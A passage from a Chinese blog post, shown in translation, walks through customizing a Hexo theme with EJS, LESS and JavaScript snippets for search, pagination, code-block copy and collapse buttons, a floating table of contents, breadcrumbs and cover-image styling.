    -webkit-appearance: none;
    height: 10px;
    width: 10px;
    background: url(/images/close.png) no-repeat;
    background-size: contain;
    }
    input[type="search"]::-webkit-search-cancel-button:hover {
    filter: brightness(120%);
    }

Deployment

Import the css in index.less:

    @import "./plugin/search.css";

I placed this search module on the archive page, above grouping; it looks decent. Then add a switch that controls whether the feature is enabled.

    <% if(theme.search && is_archive()) { %>
    <%- partial('_widget/search') %>
    <% } %>

Demo

Locally, results are instant; deployed, it's rather laggy, and mashing random input can even crash it, hmm. On my phone it failed to load at all... too much rambling indeed.

(screenshot)

Improved Pagination

The theme only provides previous-page and next-page links. Paging one at a time is too inefficient for a blog that has rambled across 28 pages by now, so let's fix it.

Methodology

Hexo paginates the rendered blog according to the number of posts. Consulting the API (变量 | Hexo):

Variable | Description | Type
page.per_page | posts displayed per page | number
page.total | total number of pages | number
page.current | current page number | number
page.current_url | URL of the current page | string
page.posts | posts on this page (Data Model) | object
page.prev | previous page number; 0 if this is the first page | number
page.prev_link | previous page URL; '' if this is the first page | string
page.next | next page number; 0 if this is the last page | number
page.next_link | next page URL; '' if this is the last page | string
page.path | path of the current page without the root; themes usually use url_for(page.path) | string

For the home page (index), the page.prev_link and page.next_link variables are available, so previous/next links are easy to implement.

But jumping to any other page takes other variables.

Observe the site's URLs: page 1 lives at /, every other page at /page/X.

So page.current and page.total are enough to write the pagination logic, with a theme variable pagination controlling how many page numbers show on each side. A sketch of the windowing logic follows.
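A minimal sketch of that windowing logic in plain JavaScript (the function and variable names here are illustrative, not part of the theme):

// Compute the pagination controls around the current page.
// `pagination` is how many page numbers to show on each side of the current one.
function pageWindow(current, total, pagination) {
var items = [];
if (current > pagination + 1) items.push(1, '...'); // leading first page + ellipsis
for (var i = current - pagination; i <= current + pagination; i++) {
if (i >= 1 && i <= total) items.push(i); // the window around the current page
}
if (total - current > pagination) items.push('...', total); // trailing ellipsis + last page
return items;
}

// e.g. pageWindow(7, 28, 2) -> [1, '...', 5, 6, 7, 8, 9, '...', 28]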

Code

home.ejs

Modify home.ejs:

    <div class="change-page">
    <div class="change-page">
<% if(page.prev !==0 && theme.pagination !== 1){ // previous page %>
    <div class="page">
    <a href="<%- url_for(page.prev_link) %>">
    <div class="box">
    &#60;
    </div>
    </a>
    </div>
    <% } %>
    <% if (page.current > theme.pagination + 1) { %>
    <div class="page">
    <a href="<%- url_for('/') %>">
    <div class="box">1
    </div>
    </a>
    </div>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <% } %>
    <% for(var i = page.current - theme.pagination; i <= page.current + theme.pagination; i++){ %>
    <% if(i >= 1 && i <= page.total){ %>
    <% if(i === page.current){ %>
    <div class="page">
    <div class="box">
    <%= i %>
    </div>
    </div>
    <% } else { %>
    <div class="page">
    <a href="<%- i=== 1 ? '/' : url_for('/page/' + i + '/') %>">
    <div class="box">
    <%= i %>
    </div>
    </a>
    </div>
    <% } %>
    <% } %>
    <% } %>
    <% if (page.total - page.current > theme.pagination) { %>
    <div class="page">
    <div class="ellipsis">
    <div class="box">...</div>
    </div>
    </div>
    <div class="page">
<a href="<%- page.total === 1 ? '/' : url_for('/page/' + page.total + '/') %>">
    <div class="box">
    <%= page.total %>
    </div>
    </a>
    </div>
    <% } %>
    <% if(page.next !==0 && theme.pagination !== 1){ %>
    <div class="page">
    <a href="<%- url_for(page.next_link) %>">
    <div class="box">
    &#62;
    </div>
    </a>
    </div>
    <% } %>
    </div>
    </div>

home.less

Then adjust home.less:

    .change-page {
    display: inline;
    color: #FFF;
    .box {
    background: #006AFF;
    width: 40px;
    height: 40px;
    line-height: 40px;
    border-radius: 10px;
    margin: 8px;
    box-shadow: 0 20px 40px 0 rgba(50,50,50,0.1);
    }
    .ellipsis
    {
    .box {
    background: #fff;
    color: #898FA0;
    }
    }
    .page {
    display: inline-block;
    a {
    color: @textColorTheme;
    text-decoration: none;
    .box {
    background: #fff;
    color: #898FA0;
    }
    .box:hover {
    margin-top: -15px;
    cursor: pointer;
    }
    }
    }
    }

Demo

(screenshot)

Pagination can now jump not only to the previous and next pages but also to the first page, the last page, and the surrounding pages, with an ellipsis added wherever the surrounding pages aren't contiguous with the first or last page.

Show description on the Home Page

Show each post's description on the home page, to better convey roughly what the post rambles about.

For encrypted posts, post.excerpt always shows "这里有东西被加密了,需要输入密码查看哦。", presumably because hexo-blog-encrypt forcibly replaces post.excerpt. The workaround I can think of is to switch to a different variable name, so following Butterfly's style I changed the key to description.

Code

home.ejs

In home.ejs, find post-block-content-info and add code that displays post.description:

    <span class="post-block-content-info-description">
    <%= post.description %>
    </span>

home.less

Adjust the styles in home.less:

    .post-card-description {
    padding: 10px 16px;
    text-align: right;
    flex-grow: 1;
    font-size: 14px;
    font-weight: 500;
    line-height: 36px;
    color: #999;
    }

Demo

The final result:

(screenshot)

Code Block Helpers

For long, smelly code, add three practical features: a copy button, a language label, and a collapse toggle for the block. (Borrowed from Butterfly.)

Methodology

When the theme renders a markdown code block, it produces the form shown below:

(screenshot)

Code

highlight_tools.ejs

highlight_tools.ejs grabs the <pre> elements and hands them, together with the relevant parameters, to highlight_tools.js:

Writing it this way feels a bit unidiomatic; it will do for now!

    <%- js('js/widget/highlight_tools.js') %>
    <script>
    var codeBlocks = document.querySelectorAll('pre');
createHighlightTools(codeBlocks, "<%= theme.icon.copy %>", "<%= theme.icon.close_code_block %>", "<%= page.highlight_shrink %>", "<%= page.highlight_height_limit %>"); // call the function with its parameters
    </script>

    highlight_tools.js

    function createHighlightTools()
    function createHighlightTools(codeBlocks, copyIcon, closeCodeBlockIcon, highlightShrink, HighlightHeightLimit) {
    codeBlocks.forEach(function (codeBlock) {
    if (!codeBlock.querySelector('code'))
    return;
    var container = createContainer(codeBlock);
    createCopyButton(container, codeBlock, copyIcon);
    createCodeLangText(container, codeBlock);
    createCloseCodeBlockButton(container, codeBlock, closeCodeBlockIcon, highlightShrink);
    setHighlightHeightLimit(codeBlock, HighlightHeightLimit);
    });
    }

First check whether the <pre> has a <code> child element, to avoid false positives.

• createContainer() wraps a layer around the top of the code block to hold the UI.

Then implement the three features in turn:

• createCopyButton(): the copy button
• createCodeLangText(): the code-language label
• createCloseCodeBlockButton(): the collapse-code-block feature
    function createContainer()
function createContainer(codeBlock) {
// create the container element that holds the code block's buttons
var container = document.createElement('div');
container.className = 'hightlight-tools';
// insert the container right before the code block
codeBlock.parentNode.insertBefore(container, codeBlock);
return container;
}

This puts a <div class="hightlight-tools"> above each code block:

(screenshot)

    function createCopyButton()

Most of what I found required pulling in something called clipboard.js, which threw errors once downloaded and referenced; here is a version that needs no plugin:

function createCopyButton(container, codeBlock, icon) {
var button = document.createElement('button');
button.className = 'copy-button';
button.type = 'button';
button.title = 'copy-button';
button.style.backgroundImage = 'url("' + icon + '")';
// append the button to the container
container.appendChild(button);
// create the "copied" notice
// as a <span> element
var span = document.createElement('span');
span.textContent = "已复制";
// add its class name
span.className = 'copy-notice';
// append the notice to the container
container.appendChild(span);

button.addEventListener('click', function () {
// grab the code block's text, line breaks included
var code = codeBlock.innerText;
// create a temporary textarea and set the code as its value
var textarea = document.createElement('textarea');
textarea.value = code;
// append the textarea to the body
document.body.appendChild(textarea);
// select the textarea's text
textarea.select();
// run the copy command
document.execCommand('copy');
// remove the temporary textarea
document.body.removeChild(textarea);
// show the "copied" notice
span.style.opacity = 1;
// fade the notice back out after 1 second
setTimeout(function () {
span.style.opacity = 0;
}, 1000);
});
}

The original fetched the code with var code = codeBlock.textContent;, which throws away the line breaks; it should be var code = codeBlock.innerText;.

A "已复制" ("copied") notice is also added.
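Incidentally, document.execCommand('copy') is deprecated; in secure contexts (HTTPS or localhost) the Clipboard API does the same job. A hedged alternative, reusing the button, span, and codeBlock from the function above, not what the theme currently uses:

// Modern replacement for the temporary-textarea trick (secure contexts only).
button.addEventListener('click', function () {
navigator.clipboard.writeText(codeBlock.innerText).then(function () {
span.style.opacity = 1;
setTimeout(function () { span.style.opacity = 0; }, 1000);
});
});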

    function createCodeLangText()
function createCodeLangText(container, codeBlock) {
// create the label text
// as a <span> element
var span = document.createElement('span');
span.textContent = codeBlock.querySelector('.hljs').classList.value.replace('hljs ', '').toUpperCase(); // the code language
if (span.textContent === 'EBNF')
span.textContent = '';
// add its class name
span.className = 'code-lang';
// append the label to the container
container.appendChild(span);
}

Take the other class name on the hljs element: that is the code language (e.g. a class list of "hljs python" yields PYTHON). If the markdown sets no language, the block is rendered with an ebnf class, which is replaced with an empty label.

    function createCloseCodeBlockButton()
    function createCloseCodeBlockButton(container, codeBlock, icon, highlight_shrink)
    {
    var button = document.createElement('button');
    button.className = 'close-code-block-button';
    button.type = 'button';
    button.title = 'close-code-block-button';
    button.style.backgroundImage = 'url("' + icon + '")';
// append the button to the container
    container.appendChild(button);
    if(Boolean(highlight_shrink))
    {
    var hljs = codeBlock.querySelector('.hljs');
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }
    button.addEventListener('click', function () {
    var hljs = codeBlock.querySelector('.hljs');
    if (!hljs.classList.contains('closed')) {
    button.style.transform = "rotate(-90deg)";
    hljs.classList.add("closed");
    }else{
    button.style.transform = "rotate(0deg)";
    hljs.classList.remove("closed");
    }
    });
    }

Grab the hljs element and toggle a closed class on it; the css handles the rest.

Posts get a new front-matter parameter highlight_shrink; when true, code blocks start out collapsed.

    function setHighlightHeightLimit()
    function setHighlightHeightLimit(codeBlock, HighlightHeightLimit)
    {
// cap the code block's maximum height
    if (HighlightHeightLimit != "")
    {
    var hljs = codeBlock.querySelector('.hljs');
    hljs.style.maxHeight = HighlightHeightLimit;
    }
    }

Caps the code block's maximum height. The value is controlled by page.highlight_height_limit.

    highlight_tools.css

    .hightlight-tools {
    background: #e6ebf1;
    position: relative;
    height: 32px;

    .copy-notice {
    font-weight: 500;
    position: absolute;
    right: 30px;
    font-size: 14px;
    opacity: 0;
    transition: opacity 0.4s;
    color: #b3b3b3;
    -webkit-user-select: none; /* Safari */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* IE 10+ */
    user-select: none;
    }

    .copy-button {
    position: absolute;
    width: 18px;
    height: 18px;
    right: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    top: 50%;
    transform: translateY(-50%);
    }

    .copy-button:hover
    {
    filter: brightness(120%);
    }

    .code-lang {
    font-weight: bold;
    position: absolute;
    left: 30px;
    font-size: 16px;
    color: #b3b3b3;
    }

    .close-code-block-button {
    position: absolute;
    width: 16px;
    height: 16px;
    bottom: 8px;
    left: 6px;
    border: none;
    background-color: rgba(0, 0, 0, 0);
    background-size: cover;
    transition: transform 0.4s;
    }
    }

    pre {
    .closed {
    height: 0;
    padding: 0 !important;
    overflow-y: hidden;
    }
    }

Right Sidebar and TOC

The theme has a toc feature built on Hexo's own toc helper, but no layout was ever written for it... so it went unused.

I had been using the hexo-toc plugin for the table of contents, but it can only sit inside one big chunk of the article and doesn't follow along as you read, which is a poor experience.

So: design a new TOC structure that sits to the right of the article and follows in real time.

The hexo-toc plugin conflicts with the built-in toc, so uninstall it:

    npm uninstall hexo-toc

Methodology

See the default toc helper: 辅助函数(Helpers)| Hexo

A single <%- toc(page.content,{list_number:false}) %> statement dumps out the whole table of contents:

(screenshot)

Hexo's built-in toc gives every heading an ID whose content is the heading text, and generates #XXX links so it can jump to the target position.

Characters that would be ambiguous in a URL are replaced with - (hexo-toc deletes such characters outright, which I suspect is why that plugin conflicts with the default toc).

Duplicate headings get a -X suffix appended to tell them apart.
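A small sketch of that ID scheme as described above (my illustration of the observed behavior, not Hexo's actual implementation):

// URL-ambiguous characters collapse to '-'; repeated headings get a numeric suffix.
var seen = {};
function headingId(text) {
var id = text.replace(/[^\w\u4e00-\u9fa5]+/g, '-'); // keep word chars and CJK, dash the rest
if (seen[id] === undefined) { seen[id] = 0; return id; }
seen[id] += 1;
return id + '-' + seen[id]; // duplicates become id-1, id-2, ...
}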

But the built-in toc seems buggy: for some document structures it fails to put every <li> inside an <ol class="toc-child"></ol>, and it falls apart the moment hexo-blog-encrypt is involved, so I decided to rewrite the TOC-generation logic myself, following the structure it generates by default.

Code

rightside.ejs

For now the theme's original goTop.ejs is replaced by a sidebar, rightside.ejs:

• hidden keeps the TOC and its button hidden; it exists because of the encryption plugin.
• toc.js controls the TOC-generation logic.
    <%- js('js/goto_position.js') %>
    <style>
    .rightside-button-icon
    {
    width: 18px;
    height: 18px;
    -webkit-user-select: none; /* Chrome, Safari, Opera */
    -moz-user-select: none; /* Firefox */
    -ms-user-select: none; /* Internet Explorer/Edge */
    user-select: none; /* Non-prefixed version, supported by most modern browsers */
    }
    </style>

    <div style="z-index: 3; position: fixed; bottom: 10px; right: 20px; transition: all 0.5s ease-out;" id="rightside">
    <% if(page.toc) { %>
    <div class="post-toc hidden" id="post-toc">
    <span class="post-toc-title">导航</span>
    <ol class="toc"></ol>
    </div>
    <div class="rightside-button hidden" id="js-toc">
    <span>
    <img src="<%- theme.icon.toc %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <%- js('js/toc.js');%>
    <script>
    initToc();
    </script>
    <% } %>
    <div class="rightside-button" id="js-go_top">
    <span>
    <img src="<%- theme.icon.go_top %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    <div class="rightside-button" id="js-go_bottom">
    <span>
    <img src="<%- theme.icon.go_bottom %>" class="rightside-button-icon" alt="Icon">
    </span>
    </div>
    </div>

    <script>
    $('#js-go_top')
    .gotoPosition( {
    speed: 300,
    target: 'top',
    } );
    $('#js-go_bottom')
    .gotoPosition( {
    speed: 300,
    target: 'bottom',
    } );
    </script>

    goto_position.js

Rework the original goTop.js so it can also scroll to the bottom:

    (function ($) {
    jQuery.fn.gotoPosition = function (opt) {
    var ele = this;
    var win = $(window);
    var doc = $("html,body");
    var defaultOpt = {
    speed: 500,
    iconSpeed: 200,
    animationShow: {
    opacity: "1",
    },
    animationHide: {
    opacity: "0",
    },
    };
    var options = $.extend(defaultOpt, opt);

    ele.click(function () {
    var targetOffset = 0;
    if (opt && opt.target) {
    if (opt.target === "top") {
targetOffset = 0; // jump to the top of the document
    } else if (opt.target === "bottom") {
targetOffset = $(document).height() - win.height(); // jump to the bottom of the document
    }
    }
    doc.animate(
    {
scrollTop: targetOffset, // scroll the document to the target position
    },
    options.speed
    );
    });
    };
    })(jQuery);

    toc.js

    function initToc()

Initialize the TOC: if the post is not encrypted, i.e. no element with the classes hbe and hbe-content exists, remove the TOC's hidden class.

Imitating Butterfly, use localStorage to decide whether the TOC is shown by default.

function initToc() {
// check whether an element with the classes 'hbe' and 'hbe-content' exists (the encrypted body)
if ($('.hbe.hbe-content').length > 0) {
// if it does, add the 'hidden' class to '.rightside-button' and '.post-toc'
$('.rightside-button, .post-toc').addClass('hidden');
return;
} else {
// find the .rightside-button elements and remove the hidden class
$('.rightside-button').removeClass('hidden');
// find the .post-toc element and remove the hidden class
$('.post-toc').removeClass('hidden');
}

var value = localStorage.getItem('aside-status');
if (value === null) { // create the entry if it does not exist yet
localStorage.setItem('aside-status', "true");
value = true;
}
if (value === "true") {
$("#post-toc").addClass("show-toc");
$("#content").addClass("show-toc");
}
createToc();
}
createToc()

Build the TOC:

• keep appending items into <ol class="toc-child"></ol>
• clicking a TOC entry smooth-scrolls to the corresponding position.
    function createToc() {
    var toc = $('.toc');
    toc.empty();

    var headings = $('#content').find('h1, h2, h3, h4, h5, h6');
    var currentLevel = 1;
    var currentList = toc;

    for (var i = 0; i < headings.length; i++) {
    var heading = $(headings[i]);
// IDs must not start with a digit; if one does, prefix an underscore
    if (/^[0-9]/.test(heading.attr('id'))) {
    heading.attr('id', '_' + heading.attr('id'));
    }
if (!heading.find('a').length) // no <a> inside the heading: probably user-created, skip it
    continue;
    var level = parseInt(heading.prop('tagName').charAt(1));
// build the nested list structure
    if (level > currentLevel) {
    for (var j = currentLevel + 1; j <= level; j++) {
    var newOl = $('<ol>').addClass('toc-child');
var newLi = $('<li>').addClass('toc-item toc-level-' + j);
    currentList.append(newLi);
    newLi.append(newOl);
    currentList = newOl;
    }
    } else if (level < currentLevel) {
    for (var j = level; j < currentLevel; j++) {
    currentList = currentList.parent().parent();
    }
    }
var li = $('<li>').addClass('toc-item toc-level-' + level);
// extract hrefValue
    var hrefValue = heading.html().match(/href="([^"]+)"/) ? heading.html().match(/href="([^"]+)"/)[1] : '';
// IDs must not start with a digit; if one does, insert an underscore
    if (!isNaN(parseInt(hrefValue.charAt(1)))) {
    hrefValue = hrefValue.slice(0, 1) + "_" + hrefValue.slice(1);
    }
// extract titleValue
    var titleValue = heading.html().match(/title="([^"]+)"/) ? heading.html().match(/title="([^"]+)"/)[1] : '';
// build the <a>
    li.html('<a class="toc-link" href="' + hrefValue + '"><span class="toc-text">' + titleValue + '</span></a>');
    var a = li.find("a");
// override the jump behavior when a TOC entry is clicked
    a.on("click", function (event) {
    event.preventDefault();
    var element = $($(this).attr("href"));
    var rect = element[0].getBoundingClientRect();
var topOffset = rect.top + window.scrollY - 90; // the fixed header bar exists, hence -90
    window.scrollTo({
    top: topOffset,
    behavior: "smooth"
    });
    });
    currentList.append(li);
    currentLevel = level;
    }
    }
$("#js-toc").click()

Clicking the button toggles whether the TOC is displayed.

    $("#js-toc").click(function () {
    var postToc = $("#post-toc");
    var content = $("#content");
    if (!postToc.hasClass("show-toc")) {
    localStorage.setItem('aside-status', true);
    content.addClass("show-toc");
    postToc.addClass("show-toc");
    } else {
    content.removeClass("show-toc");
    postToc.removeClass("show-toc");
    localStorage.setItem('aside-status', false);
    }
    });

It just hands the TOC a show-toc class; the less takes care of the rest.

function getTopHeadingId()

Get the id of the heading currently nearest the top of the page; the -90 accounts for the theme's fixed header bar:

    function getTopHeadingId() {
    const headings = document.querySelector('#content').querySelectorAll('h1, h2, h3, h4, h5, h6');
    let topHeadingId = null;
    let minDistanceFromTop = Infinity;
    for (const heading of headings) {
    const boundingRect = heading.getBoundingClientRect();
    const distanceFromTop = Math.abs(boundingRect.y - 90);
    if (distanceFromTop < minDistanceFromTop) {
    minDistanceFromTop = distanceFromTop;
    topHeadingId = heading.id;
    }
    }
    return topHeadingId;
    }
    document.addEventListener()

The TOC highlights the heading at the current position by handing its entry an active class; the less does the rest.

If the active entry has scrolled out of the TOC's visible range, force it back into view.

    document.addEventListener("scroll", function (event) {
    const tocLinks = document.querySelectorAll('a.toc-link');
    const topHeadingId = getTopHeadingId();
    tocLinks.forEach(link => {
var href = decodeURIComponent(link.getAttribute('href')).replace(/^#/, '');
    if (href == topHeadingId) {
    if (!link.classList.contains('active')) {
    link.classList.add("active");
    var toc = document.querySelector(".toc");
    var activeItem = toc.querySelector(".active");
    if (activeItem) {
    toc.scrollTo({
    top: activeItem.offsetTop - 100
    });
    }
    }
    } else {
    link.classList.remove("active");
    }
    });
});
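Scroll events fire rapidly; if the handler ever needs rate-limiting, a simple debounce would look like this (a sketch; updateActiveTocLink is a stand-in name for the handler above, not a function in the theme):

// Run fn only after `wait` ms have passed without another event.
function debounce(fn, wait) {
var timer = null;
return function () {
clearTimeout(timer);
timer = setTimeout(fn, wait);
};
}
// document.addEventListener("scroll", debounce(updateActiveTocLink, 100));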

    toc.less

Keep imitating Butterfly's layout: when the TOC is shown, the main page shifts left; mobile adaptation is written in as well.

    .post-toc {
    border-radius: 10px;
    background: rgba(255, 255, 255, 0.9);
    box-shadow: 0 0 40px 0 rgba(50, 50, 50, 0.08);
    padding: 10px 5px 10px 5px;
    border: 1px solid rgba(18, 24, 58, 0.06);

    .post-toc-title {
    margin-left: 15px;
    font-weight: bold;
    color: #424242;
    font-size: 18px;
    }

    .toc {
    margin: 12px 5px 5px 5px;
    display: block;
    overflow: auto;
    }
    .toc::-webkit-scrollbar {
    width: 5px;
    height: 5px;
    }

    .toc::-webkit-scrollbar-thumb {
background-color: #AAA; /* scrollbar thumb color */
    border-radius: 10px;
    }


    a {
    text-decoration: none;
    }

    ol {
    display: inline;
    list-style-type: none;

    a.active.toc-link {
    .toc-text {
    color: #FFF;
    }
    }

    .toc-link {
    margin-right: 5px;
    padding-top: 5px;
    padding-bottom: 5px;
    display: block;
    }

    li {
    margin-left: 10px;
    background: none;

    .toc-text {
    padding: 0 5px;
    color: #898fa0;
    }

    .active {
    span{
    padding: 4px 10px;
    border-radius: 8px;
    background: rgba(0, 106, 255, 0.8);
    }
    }

    }

    span:hover {
    color: #4183c4;
    }
    }
    }

    @media screen and (min-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: 200px;
    width: 260px;
    right: -250px;
    transition: right 0.5s ease-out;
    }

    .toc {
    max-height: 40vh;
    }

    .post-toc.show-toc {
    right: min(30px, 2vw);
    }

    .post-toc.show-toc.hidden{
    right: -250px;
    }

    .post-content.show-toc{
    max-width: min(960px, 80vw);
    transform: translateX(calc(-0.1 * min(960px, 80vw)));
    }
    }

    @media screen and (max-width: 1100px) {
    .post-toc {
    z-index: 2;
    position: fixed;
    bottom: -30vh;
    min-width: 40vw;
    max-width: calc(75vw - 10px);
    right: min(70px, calc(10vw + 30px));
    margin-left: 20px;
    transition: bottom 0.5s ease-out;
    }

    .toc {
    max-height: 16vh;
    }

    .post-toc.show-toc {
    bottom: 20px;
    }

    .post-toc.show-toc.hidden{
    right: -30vh;
    }
    }

    dispatch_event.js

Newer versions of hexo-blog-encrypt provide a callback after decryption; update the plugin:

    npm update hexo-blog-encrypt

    After Decrypt Event

Thanks to @f-dong, we now will trigger an event named hexo-blog-decrypt, so you can add a callback to listen to that event.

    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

Re-initialize the TOC after decryption:

    // trigger event
    var event = new Event('hexo-blog-decrypt');
    window.dispatchEvent(event);

// define the callback
function handleHexoBlogDecryptEvent() {
console.log("文章解密成功!");
initToc();
}

// register the event listener
    window.addEventListener('hexo-blog-decrypt', handleHexoBlogDecryptEvent);

Demo

Desktop:

(screenshot)

Mobile:

(screenshot)

Overflowing Cover Images

An original feature I dreamed up on a whim; an extra variable controls it so it looks less like a pile of hacks.

Code

home.ejs

Modify home.ejs: a new post.cover_style variable lets the yaml at the top of a post control the cover image's style:

    <div class="img-container">
    <img style="<%- post.cover_style || '' %>" src="<%= post.cover ? post.cover : theme.default_cover %>" alt="Cover">
    </div>

home.less

The corresponding less:

    .img-container {
    width: 100%;
    height: 200px;
    background: @headerBackgroundColor;
    position: relative;
    img {
    width: 100%;
    height: 100%;
    object-fit: cover;
    display: block;
    }
    }

Making an Overflow Image

Retouch an out-of-frame image in PS. You're the one, 癫狂公爵西塔尔! Even a madman should have manners.

My covers are normally 800px * 450px; this cover is 800px * 738px. In PS, keep the "frame" 450px tall, with the top of the "frame" 150px below the top of the canvas.

(screenshot)

cover_style

The post's custom cover_style:

cover_style: "height: 164%; position: absolute; top: 0; left: 0; transform: translateY(-20.3%);"

It overrides the previous cover style:

• height: 164%; comes from 738 / 450 ≈ 1.64.
• position: absolute; top: 0; left: 0; object-fit: contain; handles the overflow.
• transform: translateY(-20.3%); shifts up by 20.3%, since 150 / 738 ≈ 20.3%.

These numbers can be derived mechanically; see the sketch below.
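A small helper that derives those numbers from the artwork's geometry (a sketch; the function and parameter names here are mine, not the theme's):

// frameH: height of the in-frame region (450), imgH: full image height (738),
// topOffset: distance from the image's top edge to the frame's top edge (150).
function coverStyle(frameH, imgH, topOffset) {
var height = (imgH / frameH * 100).toFixed(1) + '%'; // 738 / 450 -> "164.0%"
var shift = (topOffset / imgH * 100).toFixed(1) + '%'; // 150 / 738 -> "20.3%"
return 'height: ' + height + '; position: absolute; top: 0; left: 0; transform: translateY(-' + shift + ');';
}
// coverStyle(450, 738, 150)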

Demo

Looks awesome!

(screenshot)

Pinned Icon

For posts with a top attribute, add a pinned icon.

Code

    home.ejs

    <% if(post.top){ %>
    <img src="<%= theme.icon.stiky %>" class="stiky" alt="Icon">
    <% } %>

home.less

And the corresponding style:

    .stiky{
    width: 18px;
    height: 18px;
    margin: 8px 6px 0 0;
    }

Demo

(screenshot)

Lock Icon

Show on the home page whether a post is encrypted, so nobody clicks through for nothing.

Code

home.ejs

Judge whether the post is encrypted by whether post.password is non-empty.

    <img src="<%- post.password ? theme.icon.locked : theme.icon.normal %>" class="meat-type" alt="Icon">

Demo

(screenshot)

Breadcrumb Navigation

The page nesting got too deep, so design a breadcrumb bar to keep visitors from getting lost.

header.ejs

Add a <ul> to hold the breadcrumb.

    <div class="h-left">
    <a href="<%= theme.menus_link.home %>" class="logo">
    <img src="<%- theme.logo %>" alt="Quiet">
    </a>
    <ul class="breadcrumb" id="breadcrumb"></ul>
    </div>

Call the js at the bottom and pass it the parameters (getting values from yaml into JS is surprisingly fiddly):

    <%- js('js/breadcrumb.js') %>
    <script>
    var menus_title = [];
    <% Object.keys(theme.menus_title).forEach(function(menu) { %>
    menus_title.push({<%= menu %>: '<%= theme.menus_title[menu] %>'});
    <% }); %>
    <% if(page.categories){ %>
    <% page.categories.data.map((cat)=>{ %>
    categoriesBreadcrumb(document.getElementById('breadcrumb'), "<%- cat.name %>", "/categories/<%- cat.name %>");
    <% }) %>
    <% } else { %>
    customBreadcrumb(document.getElementById('breadcrumb'), menus_title);
    <% } %>
    </script>

Two kinds of breadcrumb are designed:

• customBreadcrumb simply builds the trail from the page URL.
• categoriesBreadcrumb, for regular posts, builds the trail from the post's categories.

    function customBreadcrumb()

    function customBreadcrumb(breadcrumb, menus_title) {
// get the current page path
var path = window.location.pathname;
var levels = path.split('/');
levels.shift(); // drop the leading empty-string element
levels.pop(); // drop the trailing empty-string element

// first pass: check that the top-level segment is known
    for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
    levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);

    if (i === 0) {
// find the key in menus_title matching levelName and take its value
    var title_obj = menus_title.find(function(item) {
    return item[levelName] !== undefined;
    });
    var title_value = title_obj ? title_obj[levelName] : null;
    if (!title_value) {
return; // no matching value: return immediately, skip the rest
    }
    }
    }

// reaching here means every value resolved; go on and append the breadcrumb items
    for (var i = 0; i < levels.length; i++) {
    var levelLink = '/';
    for (var j = 0; j <= i; j++) {
    levelLink += levels[j] + '/';
    }
    var levelName = decodeURIComponent(levels[i]);
    var li = document.createElement('li');
    var a = document.createElement('a');
    {
    if (i === 0) {
    a.textContent = title_value;
    } else {
    a.textContent = levelName;
    }
    if(i == levels.length - 1) {
    a.classList.add("last");
    }
    a.href = levelLink;
    }
    li.appendChild(a);
    breadcrumb.appendChild(li);
    }
    }

    function categoriesBreadcrumb()

    function categoriesBreadcrumb(breadcrumb, categories, categoriesLink) {
    var li = document.createElement('li');
    var a = document.createElement('a');

    a.textContent = categories;
    a.href = categoriesLink;
    li.appendChild(a);
    breadcrumb.appendChild(li);

    li = document.createElement('li');
    a = document.createElement('a');

    a.textContent = "文章";
    a.href = window.location.href;
    a.classList.add("last");

    li.appendChild(a);
    breadcrumb.appendChild(li);
    }

header.less

Set the styles in the appropriate spot in header.less:

    .breadcrumb {
    margin-left: 5px;
    display: flex;
    list-style: none;
    padding: 0;
    a{
    color: #898fa0;
    text-decoration: none;
    }
    .last{
    color: #12183A;
    }
    .dot {
    display: inline-block;
    width: 5px;
    height: 5px;
    border-radius: 50%;
    background: #006AFF;
    position: relative;
    top: -12px;
    left: 2px;
    }
    }

    .breadcrumb li::before {
    color: #898fa0;
    content: ">";
    margin: 0 5px;
    }

Tweak the mobile adaptation a little:

    @media screen and (max-width:660px) {
    .header {
    .header-top {
    .h-left {
    flex-grow: 3;
    }
    ...

Result

customBreadcrumb

(screenshot)

categoriesBreadcrumb

(screenshot)

hexo-tag-aplayer Conflicts with hexo-blog-encrypt

This seems to be a universal problem, whatever the theme.

Add a flag to the front matter of posts that use APlayer:

APlayer: true

From APlayer (a clean, pretty HTML5 music player supporting playlist and pinned modes, gitee.com), grab APlayer.min.css and APlayer.min.js and put them in the matching directories.

Modify header.ejs:

    <% if(page.APlayer) { %>
    <%- css('css/third-party/APlayer.min.css') %>
    <%- js('js/third-party/APlayer.min.js') %>
<% } %>

Set a parameter under source/_config.yml so the assets aren't injected twice (hexo-tag-aplayer/docs/README-zh_cn.md at master · MoePlayer/hexo-tag-aplayer, github.com):

    aplayer:
asset_inject: false

OK. I expect the hexo-tag-map plugin works the same way, but I don't much like that plugin and haven't used it in ages, so I'll leave it unconfigured.

Giscus Comments

Switch the comment system to giscus.

tabs

Usage:

    {% tabs Unique name, [index] %}
    <!-- tab [Tab caption] [@icon] -->
    Any content (support inline tags too).
    <!-- endtab -->
    {% endtabs %}

    Unique name : Unique name of tabs block tag without comma.
    Will be used in #id's as prefix for each tab with their index numbers.
    If there are whitespaces in name, for generate #id all whitespaces will replaced by dashes.
    Only for current url of post/page must be unique!
    [index] : Index number of active tab.
    If not specified, first tab (1) will be selected.
    If index is -1, no tab will be selected. It's will be something like spoiler.
    Optional parameter.
    [Tab caption] : Caption of current tab.
    If not caption specified, unique name with tab index suffix will be used as caption of tab.
    If not caption specified, but specified icon, caption will empty.
    Optional parameter.
    [@icon] : FontAwesome icon name (full-name, look like 'fas fa-font')
    Can be specified with or without space; e.g. 'Tab caption @icon' similar to 'Tab caption@icon'.
    Optional parameter.

Tab name taken from the first Tab

Icon only, no Tab name

Name + icon

hide

Ported from butterfly: Butterfly 安裝文檔(三) 主題配置-1 | Butterfly

Available from 2.2.0 up.

Note: headings h1 - h6 are discouraged inside tag-hide content, because the Toc would also list the hidden headings, and scrolling misbehaves when hidden content has not been revealed.

inline

inline adds a button inside the running text to hide content; text only.

(the content must not contain an English comma; use &sbquo; instead)

    哪個英文字母最酷?{% hideInline 因為西裝褲(C 裝酷),查看答案,#FF7242,#fff %}

